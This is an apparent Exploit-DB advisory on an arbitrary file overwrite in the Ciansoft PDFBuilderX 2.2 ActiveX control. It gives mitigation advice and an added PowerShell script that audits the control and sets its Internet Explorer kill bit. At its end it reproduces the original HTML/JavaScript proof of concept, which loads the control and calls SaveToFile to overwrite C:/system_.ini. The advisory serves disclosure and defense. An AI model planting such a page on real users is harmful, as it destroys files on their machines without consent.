Vendor: Ciansoft
Author: Alfons Luja
CVSS: 7.5 (HIGH)
Vulnerability type: Arbitrary File Overwrite
CWE: 264
Product Name: PDFBuilderX
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:ciansoft:pdfbuilderx
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2009

Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite

Ciansoft PDFBuilderX 2.2 ships an ActiveX control (class PDFDoc, CLSID {00E7C7F8-71E2-498A-AB28-A3D72FC74485}) that implements IObjectSafety and reports itself safe for scripting and initialization by untrusted callers, and no kill bit is set for it. Internet Explorer therefore lets any web page instantiate the control, and the control's SaveToFile method writes the current document to whatever path the page supplies, with no validation of that path. An attacker who convinces a user to open a crafted HTML page in Internet Explorer can overwrite any file the browser's user account can write to; the proof of concept below adds one page and saves the resulting PDF data over C:\system_.ini. Note that the path is chosen by the attacker's page, not by the user.

Mitigation:

Upgrade to the latest version of Ciansoft PDFBuilderX (the vendor has released a fix). Where the control cannot be upgraded or removed promptly, set the Internet Explorer kill bit for CLSID {00E7C7F8-71E2-498A-AB28-A3D72FC74485} so the browser refuses to instantiate it, or unregister the control on systems that do not need it. Checking only the registry "safe for scripting" categories is not enough here: the control answers "safe" at runtime through IObjectSafety even though those category keys are absent.
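As an added example (not part of the original advisory and not Ciansoft's code), the following PowerShell script audits the PDFDoc control on a Windows host and, with -SetKillBit, applies the Internet Explorer kill bit described above. The CLSID comes from the advisory; the "Safe for scripting" and "Safe for initializing" category GUIDs and the Compatibility Flags value 0x400 under the ActiveX Compatibility key are Microsoft's standard values. The script must run from an elevated prompt because the kill bit lives under HKLM.

```powershell
# Added example: audit and kill-bit the PDFBuilderX PDFDoc ActiveX control.
# Not from the original advisory or from Ciansoft. Run elevated.
param(
    [switch]$SetKillBit
)

$Clsid = '{00E7C7F8-71E2-498A-AB28-A3D72FC74485}'   # PDFDoc, from the advisory

# Component categories Internet Explorer consults in the registry.
$CatSafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'

$ClsidKey    = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
$KillBitKey  = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
$KillBitFlag = 0x400   # bit in "Compatibility Flags" that blocks instantiation in IE

function Get-ControlState {
    $registered = Test-Path $ClsidKey
    $server = if ($registered) {
        (Get-ItemProperty -Path "$ClsidKey\InprocServer32" -ErrorAction SilentlyContinue).'(default)'
    }
    $catKey = "$ClsidKey\Implemented Categories"
    $flags  = (Get-ItemProperty -Path $KillBitKey -Name 'Compatibility Flags' `
               -ErrorAction SilentlyContinue).'Compatibility Flags'
    [pscustomobject]@{
        Clsid                  = $Clsid
        Registered             = $registered
        InprocServer           = $server
        # These two only reflect the registry categories. The advisory records
        # that they are absent for this control, yet it still scripts in IE
        # because it implements IObjectSafety and reports itself safe at runtime.
        RegSafeForScripting    = Test-Path "$catKey\$CatSafeForScripting"
        RegSafeForInitializing = Test-Path "$catKey\$CatSafeForInitializing"
        KillBitSet             = ($null -ne $flags) -and (($flags -band $KillBitFlag) -ne 0)
    }
}

function Set-KillBit {
    if (-not (Test-Path $KillBitKey)) {
        New-Item -Path $KillBitKey -Force | Out-Null
    }
    $current = (Get-ItemProperty -Path $KillBitKey -Name 'Compatibility Flags' `
                -ErrorAction SilentlyContinue).'Compatibility Flags'
    # OR the kill bit into any flags already present rather than overwriting them.
    $new = [int]$current -bor $KillBitFlag
    New-ItemProperty -Path $KillBitKey -Name 'Compatibility Flags' -Value $new `
        -PropertyType DWord -Force | Out-Null
}

$state = Get-ControlState
$state | Format-List

if (-not $state.Registered) {
    Write-Host "Control $Clsid is not registered on this host; nothing to do."
} elseif ($state.KillBitSet) {
    Write-Host "Kill bit already set; Internet Explorer will not instantiate $Clsid."
} elseif ($SetKillBit) {
    Set-KillBit
    Write-Host "Kill bit set for $Clsid."
    Get-ControlState | Format-List
} else {
    Write-Host "Control is registered and not kill-bitted; rerun with -SetKillBit to block it."
}
```

The kill bit is the one registry-side setting that reliably stops Internet Explorer from loading the control, which is why the script does not trust the category keys as a verdict; the control stays usable from native applications that embed it, so the kill bit is a browser-side stopgap until the patched version is installed.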
Source (Exploit-DB raw data):

<b>
    Ciansoft PDFBuilderX 2.2 Arbitrary File Overwrite    <br/>
                         p0c                            <br/>
                     Alfons Luja                        <br/>
            Greetings to the eternal fans               <br/>
                      Tesw Eporue                       <br/>
                        -9002-                          <br/>
                         l00l                           <br/>
</b>
<!-- Instantiates the PDFDoc control; IE permits this because the control
     declares itself safe for scripting via IObjectSafety and has no kill bit. -->
<object classid='clsid:00E7C7F8-71E2-498A-AB28-A3D72FC74485' id='kupa'></object>
<script>
/*
 Class PDFDoc
 GUID: {00E7C7F8-71E2-498A-AB28-A3D72FC74485}
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe:  Safe for untrusted: caller,data
 IPStorage Safe:  Safe for untrusted: caller,data
 KillBitSet: False
 vend0r : www.ciansoft.com
*/
try{
    var obj = document.getElementById('kupa');
    // Give the document one page so there is PDF content to write out.
    obj.AddPage(1);
    // SaveToFile writes the document to a caller-supplied path with no
    // validation; here it clobbers C:\system_.ini with PDF data.
    obj.SaveToFile("C:/system_.ini");
    window.alert('Aplauz !!! g0rion pownsYa l0l - n0wH Check ya C:');
} catch(err){  window.alert('Poc failed'); }
</script>

# milw0rm.com [2009-01-15]